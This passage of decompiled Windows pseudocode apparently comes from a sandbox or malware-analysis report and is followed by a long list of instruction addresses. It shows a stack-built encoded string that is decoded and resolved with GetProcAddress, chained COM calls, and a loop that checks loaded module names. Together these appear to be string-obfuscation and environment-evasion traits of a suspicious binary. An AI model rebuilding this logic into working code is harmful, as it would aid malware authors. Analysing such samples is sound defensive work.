                                                                                                                                                                                                        						 *((char*)(_t562 + 0x14)) = 0x95;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x15)) = 0x21;
                                                                                                                                                                                                        						_t451 = _t562 + 0x134;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x1e)) = 0x2a;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x1f)) = 0x57;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x20)) = 0xda;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x21)) = 0xc;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x22)) = 0x55;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x23)) = 0x25;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x24)) = 0x8c;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x25)) = 0xf9;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x26)) = 0x35;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x27)) = 0x97;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x28)) = 0xd0;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x29)) = 0x87;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x2a)) = 0x7b;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x2b)) = 0xf;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x2c)) = 0xf4;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x2d)) = 0x76;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x2e)) = 0xb9;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x2f)) = 0x34;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x30)) = 0xbf;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x31)) = 0x1e;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x32)) = 0xe7;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x33)) = 0x78;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x34)) = 0x98;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x35)) = 0xe9;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x36)) = 0x6f;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x37)) = 0xb4;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x38)) = 0;
                                                                                                                                                                                                        						_t366 = E00401650(_t562 + 0x14, _t451);
                                                                                                                                                                                                        						_t563 = _t562 + 8;
                                                                                                                                                                                                        						_t367 = GetProcAddress(_t365, _t366);
                                                                                                                                                                                                        						__eflags = _t367;
                                                                                                                                                                                                        						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
                                                                                                                                                                                                        						__eflags = _t452;
                                                                                                                                                                                                        						 *(_t563 + 0x47) = _t452 == 0;
                                                                                                                                                                                                        						 *0x423480 = _t367;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t563 + 0x80)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t563 + 0x84)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
                                                                                                                                                                                                        						 *(_t563 + 0x58) = 0;
                                                                                                                                                                                                        						 *(_t563 + 0x54) = 0;
                                                                                                                                                                                                        						__eflags = _t452;
                                                                                                                                                                                                        						if(_t452 != 0) {
                                                                                                                                                                                                        							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
                                                                                                                                                                                                        							__eflags = _t368;
                                                                                                                                                                                                        							if(_t368 >= 0) {
                                                                                                                                                                                                        								__eflags =  *(_t563 + 0x47);
                                                                                                                                                                                                        								if( *(_t563 + 0x47) == 0) {
                                                                                                                                                                                                        									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
                                                                                                                                                                                                        									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
                                                                                                                                                                                                        									_t376 =  *((intOrPtr*)(_t563 + 0x80));
                                                                                                                                                                                                        									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
                                                                                                                                                                                                        									__eflags = _t378;
                                                                                                                                                                                                        									if(_t378 >= 0) {
                                                                                                                                                                                                        										_t381 =  *((intOrPtr*)(_t563 + 0x84));
                                                                                                                                                                                                        										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
                                                                                                                                                                                                        										__eflags = _t383;
                                                                                                                                                                                                        										if(_t383 >= 0) {
                                                                                                                                                                                                        											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
                                                                                                                                                                                                        											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
                                                                                                                                                                                                        											__eflags = _t385;
                                                                                                                                                                                                        											if(_t385 >= 0) {
                                                                                                                                                                                                        												 *((intOrPtr*)(_t563 + 0x38)) = 0;
                                                                                                                                                                                                        												E00401870(_t563 + 0x44, _t552, "_._");
                                                                                                                                                                                                        												_t539 = __imp__#8;
                                                                                                                                                                                                        												 *((intOrPtr*)(_t563 + 0x40)) = 0;
                                                                                                                                                                                                        												 *_t539(_t563 + 0x94);
                                                                                                                                                                                                        												E00401870(_t563 + 0x3c, _t552, "___");
                                                                                                                                                                                                        												 *_t539(_t563 + 0xa4);
                                                                                                                                                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
                                                                                                                                                                                                        												_t542 =  *(_t563 + 0x58);
                                                                                                                                                                                                        												__eflags = _t542;
                                                                                                                                                                                                        												if(_t542 == 0) {
                                                                                                                                                                                                        													E0040AD90(0x80004003);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
                                                                                                                                                                                                        												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
                                                                                                                                                                                                        												 *((intOrPtr*)(_t563 + 0x98)) = 0;
                                                                                                                                                                                                        												__imp__#15(0x11, 1, _t563 + 0x88); // executed
                                                                                                                                                                                                        												_t543 = _t396;
                                                                                                                                                                                                        												 *((intOrPtr*)(_t563 + 0x50)) = 0;
                                                                                                                                                                                                        												__imp__#23(_t543, _t563 + 0x48);
                                                                                                                                                                                                        												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
                                                                                                                                                                                                        												_t564 = _t563 + 0xc;
                                                                                                                                                                                                        												__imp__#24(_t543);
                                                                                                                                                                                                        												_t399 =  *(_t564 + 0x54);
                                                                                                                                                                                                        												__eflags = _t399;
                                                                                                                                                                                                        												if(_t399 == 0) {
                                                                                                                                                                                                        													_t399 = E0040AD90(0x80004003);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
                                                                                                                                                                                                        												__eflags = _t543;
                                                                                                                                                                                                        												if(_t543 != 0) {
                                                                                                                                                                                                        													__imp__#16(_t543);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t402 =  *(_t564 + 0x34);
                                                                                                                                                                                                        												__eflags = _t402;
                                                                                                                                                                                                        												if(_t402 == 0) {
                                                                                                                                                                                                        													_t402 = E0040AD90(0x80004003);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t469 =  *(_t564 + 0x40);
                                                                                                                                                                                                        												_t555 = _t402;
                                                                                                                                                                                                        												__eflags = _t469;
                                                                                                                                                                                                        												if(_t469 == 0) {
                                                                                                                                                                                                        													_t531 = 0;
                                                                                                                                                                                                        													__eflags = 0;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t531 =  *_t469;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
                                                                                                                                                                                                        												__imp__#411(0xc, 0, 0);
                                                                                                                                                                                                        												_t471 =  *(_t564 + 0x3c);
                                                                                                                                                                                                        												__eflags = _t471;
                                                                                                                                                                                                        												if(_t471 == 0) {
                                                                                                                                                                                                        													E0040AD90(0x80004003);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t405 =  *(_t564 + 0x38);
                                                                                                                                                                                                        												__eflags = _t405;
                                                                                                                                                                                                        												if(_t405 == 0) {
                                                                                                                                                                                                        													_t514 = 0;
                                                                                                                                                                                                        													__eflags = 0;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t514 =  *_t405;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t563 = _t564 - 0x10;
                                                                                                                                                                                                        												_t407 = _t563;
                                                                                                                                                                                                        												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
                                                                                                                                                                                                        												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
                                                                                                                                                                                                        												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
                                                                                                                                                                                                        												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
                                                                                                                                                                                                        												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
                                                                                                                                                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
                                                                                                                                                                                                        												_t538 = __imp__#9; // 0x777dcf00
                                                                                                                                                                                                        												_t538->i(_t563 + 0xa4);
                                                                                                                                                                                                        												E004019A0(_t563 + 0x38);
                                                                                                                                                                                                        												_t538->i(_t563 + 0x94);
                                                                                                                                                                                                        												_t413 =  *(_t563 + 0x3c);
                                                                                                                                                                                                        												__eflags = _t413;
                                                                                                                                                                                                        												if(_t413 != 0) {
                                                                                                                                                                                                        													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												E004019A0(_t563 + 0x40);
                                                                                                                                                                                                        												_t415 =  *(_t563 + 0x34);
                                                                                                                                                                                                        												__eflags = _t415;
                                                                                                                                                                                                        												if(_t415 != 0) {
                                                                                                                                                                                                        													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t379 =  *((intOrPtr*)(_t563 + 0x174));
                                                                                                                                                                                                        									__eflags = _t379 - _t563 + 0x178;
                                                                                                                                                                                                        									if(__eflags != 0) {
                                                                                                                                                                                                        										_push(_t379);
                                                                                                                                                                                                        										E0040B6B5(0, _t528, _t538, __eflags);
                                                                                                                                                                                                        										_t563 = _t563 + 4;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t369 =  *(_t563 + 0x54);
                                                                                                                                                                                                        							__eflags = _t369;
                                                                                                                                                                                                        							if(_t369 != 0) {
                                                                                                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t370 =  *(_t563 + 0x58);
                                                                                                                                                                                                        							__eflags = _t370;
                                                                                                                                                                                                        							if(_t370 != 0) {
                                                                                                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L80;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                                                                                                                                                        						_t565 = _t557 + 8;
                                                                                                                                                                                                        						_t547 = _t428;
                                                                                                                                                                                                        						_t520 = _t565 + 0x298;
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							_t429 =  *_t520;
                                                                                                                                                                                                        							if(_t429 !=  *_t547) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							if(_t429 == 0) {
                                                                                                                                                                                                        								L7:
                                                                                                                                                                                                        								_t429 = 0;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t493 =  *((intOrPtr*)(_t520 + 1));
                                                                                                                                                                                                        								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
                                                                                                                                                                                                        									break;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t520 = _t520 + 2;
                                                                                                                                                                                                        									_t547 = _t547 + 2;
                                                                                                                                                                                                        									if(_t493 != 0) {
                                                                                                                                                                                                        										continue;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L7;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							if(_t429 != 0) {
                                                                                                                                                                                                        								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
                                                                                                                                                                                                        								_t557 = _t565 + 8;
                                                                                                                                                                                                        								_t548 = _t431;
                                                                                                                                                                                                        								_t488 = _t557 + 0x298;
                                                                                                                                                                                                        								while(1) {
                                                                                                                                                                                                        									_t432 =  *_t488;
                                                                                                                                                                                                        									__eflags = _t432 -  *_t548;
                                                                                                                                                                                                        									if(_t432 !=  *_t548) {
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags = _t432;
                                                                                                                                                                                                        									if(_t432 == 0) {
                                                                                                                                                                                                        										L16:
                                                                                                                                                                                                        										_t432 = 0;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t432 =  *((intOrPtr*)(_t488 + 1));
                                                                                                                                                                                                        										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
                                                                                                                                                                                                        										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
                                                                                                                                                                                                        											break;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t488 = _t488 + 2;
                                                                                                                                                                                                        											_t548 = _t548 + 2;
                                                                                                                                                                                                        											__eflags = _t432;
                                                                                                                                                                                                        											if(_t432 != 0) {
                                                                                                                                                                                                        												continue;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												goto L16;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									L18:
                                                                                                                                                                                                        									__eflags = _t432;
                                                                                                                                                                                                        									if(_t432 == 0) {
                                                                                                                                                                                                        										goto L10;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t435 = Module32Next(_t525, _t557 + 0x278);
                                                                                                                                                                                                        										__eflags = _t435;
                                                                                                                                                                                                        										if(_t435 != 0) {
                                                                                                                                                                                                        											do {
                                                                                                                                                                                                        												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                                                                                                                                                        												_t566 = _t557 + 8;
                                                                                                                                                                                                        												_t549 = _t437;
                                                                                                                                                                                                        												_t490 = _t566 + 0x298;
                                                                                                                                                                                                        												while(1) {
                                                                                                                                                                                                        													_t438 =  *_t490;
                                                                                                                                                                                                        													__eflags = _t438 -  *_t549;
                                                                                                                                                                                                        													if(_t438 !=  *_t549) {
                                                                                                                                                                                                        														break;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													__eflags = _t438;
                                                                                                                                                                                                        													if(_t438 == 0) {
                                                                                                                                                                                                        														L26:
                                                                                                                                                                                                        														_t438 = 0;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t438 =  *((intOrPtr*)(_t490 + 1));
                                                                                                                                                                                                        														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
                                                                                                                                                                                                        														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
                                                                                                                                                                                                        															break;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t490 = _t490 + 2;
                                                                                                                                                                                                        															_t549 = _t549 + 2;
                                                                                                                                                                                                        															__eflags = _t438;
                                                                                                                                                                                                        															if(_t438 != 0) {
                                                                                                                                                                                                        																continue;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																goto L26;
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													L28:
                                                                                                                                                                                                        													__eflags = _t438;
                                                                                                                                                                                                        													if(_t438 == 0) {
                                                                                                                                                                                                        														goto L10;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
                                                                                                                                                                                                        														_t557 = _t566 + 8;
                                                                                                                                                                                                        														_t550 = _t439;
                                                                                                                                                                                                        														_t492 = _t557 + 0x298;
                                                                                                                                                                                                        														while(1) {
                                                                                                                                                                                                        															_t440 =  *_t492;
                                                                                                                                                                                                        															__eflags = _t440 -  *_t550;
                                                                                                                                                                                                        															if(_t440 !=  *_t550) {
                                                                                                                                                                                                        																break;
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        															__eflags = _t440;
                                                                                                                                                                                                        															if(_t440 == 0) {
                                                                                                                                                                                                        																L34:
                                                                                                                                                                                                        																_t440 = 0;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t440 =  *((intOrPtr*)(_t492 + 1));
                                                                                                                                                                                                        																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
                                                                                                                                                                                                        																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
                                                                                                                                                                                                        																	break;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t492 = _t492 + 2;
                                                                                                                                                                                                        																	_t550 = _t550 + 2;
                                                                                                                                                                                                        																	__eflags = _t440;
                                                                                                                                                                                                        																	if(_t440 != 0) {
                                                                                                                                                                                                        																		continue;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		goto L34;
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        															L36:
                                                                                                                                                                                                        															__eflags = _t440;
                                                                                                                                                                                                        															if(_t440 == 0) {
                                                                                                                                                                                                        																goto L10;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																goto L37;
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        															goto L81;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														asm("sbb eax, eax");
                                                                                                                                                                                                        														asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                        														goto L36;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													goto L81;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												asm("sbb eax, eax");
                                                                                                                                                                                                        												asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                        												goto L28;
                                                                                                                                                                                                        												L37:
                                                                                                                                                                                                        												_t442 = Module32Next(_t525, _t557 + 0x278);
                                                                                                                                                                                                        												__eflags = _t442;
                                                                                                                                                                                                        											} while (_t442 != 0);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										goto L38;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L81;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                        								goto L18;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                        								CloseHandle(_t525);
                                                                                                                                                                                                        								return 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							goto L81;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						asm("sbb eax, eax");
                                                                                                                                                                                                        						asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L81:
                                                                                                                                                                                                        			}

































































































                                                                                                                                                                                                        0x004019f0
                                                                                                                                                                                                        0x004019f0
                                                                                                                                                                                                        0x004019fd
                                                                                                                                                                                                        0x00401a10
                                                                                                                                                                                                        0x00401a15
                                                                                                                                                                                                        0x00401a1a
                                                                                                                                                                                                        0x00401a1f
                                                                                                                                                                                                        0x00401a24
                                                                                                                                                                                                        0x00401a29
                                                                                                                                                                                                        0x00401a2e
                                                                                                                                                                                                        0x00401a33
                                                                                                                                                                                                        0x00401a38
                                                                                                                                                                                                        0x00401a3d
                                                                                                                                                                                                        0x00401a42
                                                                                                                                                                                                        0x00401a47
                                                                                                                                                                                                        0x00401a4c
                                                                                                                                                                                                        0x00401a51
                                                                                                                                                                                                        0x00401a56
                                                                                                                                                                                                        0x00401a5b
                                                                                                                                                                                                        0x00401a60
                                                                                                                                                                                                        0x00401a65
                                                                                                                                                                                                        0x00401a6a
                                                                                                                                                                                                        0x00401a6f
                                                                                                                                                                                                        0x00401a74
                                                                                                                                                                                                        0x00401a79
                                                                                                                                                                                                        0x00401a7e
                                                                                                                                                                                                        0x00401a83
                                                                                                                                                                                                        0x00401a88
                                                                                                                                                                                                        0x00401a8d
                                                                                                                                                                                                        0x00401a92
                                                                                                                                                                                                        0x00401a97
                                                                                                                                                                                                        0x00401a9c
                                                                                                                                                                                                        0x00401aa1
                                                                                                                                                                                                        0x00401aa6
                                                                                                                                                                                                        0x00401aab
                                                                                                                                                                                                        0x00401ab0
                                                                                                                                                                                                        0x00401ab9
                                                                                                                                                                                                        0x00401aba
                                                                                                                                                                                                        0x00401abf
                                                                                                                                                                                                        0x00401ac7
                                                                                                                                                                                                        0x0040248d
                                                                                                                                                                                                        0x0040248d
                                                                                                                                                                                                        0x00402496
                                                                                                                                                                                                        0x00401acd
                                                                                                                                                                                                        0x00401ad6
                                                                                                                                                                                                        0x00401ae2
                                                                                                                                                                                                        0x00401ae6
                                                                                                                                                                                                        0x00401af1
                                                                                                                                                                                                        0x00401af6
                                                                                                                                                                                                        0x00401afb
                                                                                                                                                                                                        0x00401b00
                                                                                                                                                                                                        0x00401b05
                                                                                                                                                                                                        0x00401b0a
                                                                                                                                                                                                        0x00401b0f
                                                                                                                                                                                                        0x00401b14
                                                                                                                                                                                                        0x00401b19
                                                                                                                                                                                                        0x00401b1e
                                                                                                                                                                                                        0x00401b23
                                                                                                                                                                                                        0x00401b28
                                                                                                                                                                                                        0x00401b2d
                                                                                                                                                                                                        0x00401b32
                                                                                                                                                                                                        0x00401b37
                                                                                                                                                                                                        0x00401b3c
                                                                                                                                                                                                        0x00401b41
                                                                                                                                                                                                        0x00401b46
                                                                                                                                                                                                        0x00401b4b
                                                                                                                                                                                                        0x00401b50
                                                                                                                                                                                                        0x00401b55
                                                                                                                                                                                                        0x00401b5a
                                                                                                                                                                                                        0x00401b5f
                                                                                                                                                                                                        0x00401b64
                                                                                                                                                                                                        0x00401b69
                                                                                                                                                                                                        0x00401b6e
                                                                                                                                                                                                        0x00401b73
                                                                                                                                                                                                        0x00401b78
                                                                                                                                                                                                        0x00401b7d
                                                                                                                                                                                                        0x00401b85
                                                                                                                                                                                                        0x00401b8d
                                                                                                                                                                                                        0x00401b95
                                                                                                                                                                                                        0x00401b9d
                                                                                                                                                                                                        0x00401ba4
                                                                                                                                                                                                        0x00401ba9
                                                                                                                                                                                                        0x00401bae
                                                                                                                                                                                                        0x00401bb3
                                                                                                                                                                                                        0x00401bb8
                                                                                                                                                                                                        0x00401bbd
                                                                                                                                                                                                        0x00401bc2
                                                                                                                                                                                                        0x00401bc7
                                                                                                                                                                                                        0x00401bcc
                                                                                                                                                                                                        0x00401bd1
                                                                                                                                                                                                        0x00401bd6
                                                                                                                                                                                                        0x00401bdb
                                                                                                                                                                                                        0x00401be0
                                                                                                                                                                                                        0x00401be5
                                                                                                                                                                                                        0x00401bea
                                                                                                                                                                                                        0x00401bef
                                                                                                                                                                                                        0x00401bf4
                                                                                                                                                                                                        0x00401bf9
                                                                                                                                                                                                        0x00401bfe
                                                                                                                                                                                                        0x00401c03
                                                                                                                                                                                                        0x00401c08
                                                                                                                                                                                                        0x00401c0d
                                                                                                                                                                                                        0x00401c12
                                                                                                                                                                                                        0x00401c17
                                                                                                                                                                                                        0x00401c1c
                                                                                                                                                                                                        0x00401c21
                                                                                                                                                                                                        0x00401c26
                                                                                                                                                                                                        0x00401c2b
                                                                                                                                                                                                        0x00401c30
                                                                                                                                                                                                        0x00401c35
                                                                                                                                                                                                        0x00401c3a
                                                                                                                                                                                                        0x00401c3f
                                                                                                                                                                                                        0x00401c44
                                                                                                                                                                                                        0x00401c48
                                                                                                                                                                                                        0x00401c4f
                                                                                                                                                                                                        0x00401dc3
                                                                                                                                                                                                        0x00401dc4
                                                                                                                                                                                                        0x00401de0
                                                                                                                                                                                                        0x00401de2
                                                                                                                                                                                                        0x00401de7
                                                                                                                                                                                                        0x00401dec
                                                                                                                                                                                                        0x00401df1
                                                                                                                                                                                                        0x00401df6
                                                                                                                                                                                                        0x00401dfb
                                                                                                                                                                                                        0x00401e00
                                                                                                                                                                                                        0x00401e05
                                                                                                                                                                                                        0x00401e0a
                                                                                                                                                                                                        0x00401e0f
                                                                                                                                                                                                        0x00401e14
                                                                                                                                                                                                        0x00401e19
                                                                                                                                                                                                        0x00401e1e
                                                                                                                                                                                                        0x00401e23
                                                                                                                                                                                                        0x00401e28
                                                                                                                                                                                                        0x00401e2d
                                                                                                                                                                                                        0x00401e32
                                                                                                                                                                                                        0x00401e37
                                                                                                                                                                                                        0x00401e3c
                                                                                                                                                                                                        0x00401e41
                                                                                                                                                                                                        0x00401e46
                                                                                                                                                                                                        0x00401e4b
                                                                                                                                                                                                        0x00401e50
                                                                                                                                                                                                        0x00401e55
                                                                                                                                                                                                        0x00401e5a
                                                                                                                                                                                                        0x00401e5f
                                                                                                                                                                                                        0x00401e64
                                                                                                                                                                                                        0x00401e69
                                                                                                                                                                                                        0x00401e6e
                                                                                                                                                                                                        0x00401e73
                                                                                                                                                                                                        0x00401e78
                                                                                                                                                                                                        0x00401e7d
                                                                                                                                                                                                        0x00401e82
                                                                                                                                                                                                        0x00401e86
                                                                                                                                                                                                        0x00401e8b
                                                                                                                                                                                                        0x00401e96
                                                                                                                                                                                                        0x00401e9a
                                                                                                                                                                                                        0x00401ea4
                                                                                                                                                                                                        0x00401eaf
                                                                                                                                                                                                        0x00401eba
                                                                                                                                                                                                        0x00401ebf
                                                                                                                                                                                                        0x00401ec4
                                                                                                                                                                                                        0x00401ec6
                                                                                                                                                                                                        0x00401ecb
                                                                                                                                                                                                        0x00401ece
                                                                                                                                                                                                        0x00401ed2
                                                                                                                                                                                                        0x00401ed4
                                                                                                                                                                                                        0x00401eef
                                                                                                                                                                                                        0x00401ed6
                                                                                                                                                                                                        0x00401edd
                                                                                                                                                                                                        0x00401ee2
                                                                                                                                                                                                        0x00401ee6
                                                                                                                                                                                                        0x00401ee9
                                                                                                                                                                                                        0x00401ee9
                                                                                                                                                                                                        0x00401ef7
                                                                                                                                                                                                        0x00401efc
                                                                                                                                                                                                        0x00401f02
                                                                                                                                                                                                        0x00401f08
                                                                                                                                                                                                        0x00401f0c
                                                                                                                                                                                                        0x00401f15
                                                                                                                                                                                                        0x00401f18
                                                                                                                                                                                                        0x00401f1a
                                                                                                                                                                                                        0x00401f1c
                                                                                                                                                                                                        0x00401f22
                                                                                                                                                                                                        0x00401f22
                                                                                                                                                                                                        0x00401f24
                                                                                                                                                                                                        0x00401f28
                                                                                                                                                                                                        0x00401f2f
                                                                                                                                                                                                        0x00401f33
                                                                                                                                                                                                        0x00401f33
                                                                                                                                                                                                        0x00401f40
                                                                                                                                                                                                        0x00401f45
                                                                                                                                                                                                        0x00401f4a
                                                                                                                                                                                                        0x00401f4b
                                                                                                                                                                                                        0x00401f50
                                                                                                                                                                                                        0x00401f58
                                                                                                                                                                                                        0x00401f58
                                                                                                                                                                                                        0x00401f58
                                                                                                                                                                                                        0x00401f58
                                                                                                                                                                                                        0x00401f33
                                                                                                                                                                                                        0x00401f63
                                                                                                                                                                                                        0x00401f63
                                                                                                                                                                                                        0x00401f69
                                                                                                                                                                                                        0x00401f72
                                                                                                                                                                                                        0x00401f72
                                                                                                                                                                                                        0x00401f72
                                                                                                                                                                                                        0x00401f73
                                                                                                                                                                                                        0x00401f75
                                                                                                                                                                                                        0x00401f7b
                                                                                                                                                                                                        0x00401f80
                                                                                                                                                                                                        0x00401f81
                                                                                                                                                                                                        0x00401f86
                                                                                                                                                                                                        0x00401f86
                                                                                                                                                                                                        0x00401f8c
                                                                                                                                                                                                        0x00401f8d
                                                                                                                                                                                                        0x00401f8d
                                                                                                                                                                                                        0x00401f9d
                                                                                                                                                                                                        0x00401fa2
                                                                                                                                                                                                        0x00401fa6
                                                                                                                                                                                                        0x00401fac
                                                                                                                                                                                                        0x00401faf
                                                                                                                                                                                                        0x00401fb6
                                                                                                                                                                                                        0x00401fbf
                                                                                                                                                                                                        0x00401fc4
                                                                                                                                                                                                        0x00401fc8
                                                                                                                                                                                                        0x00401fce
                                                                                                                                                                                                        0x00401fd3
                                                                                                                                                                                                        0x00401fe0
                                                                                                                                                                                                        0x00401fec
                                                                                                                                                                                                        0x00401ffe
                                                                                                                                                                                                        0x00402001
                                                                                                                                                                                                        0x00402006
                                                                                                                                                                                                        0x0040200b
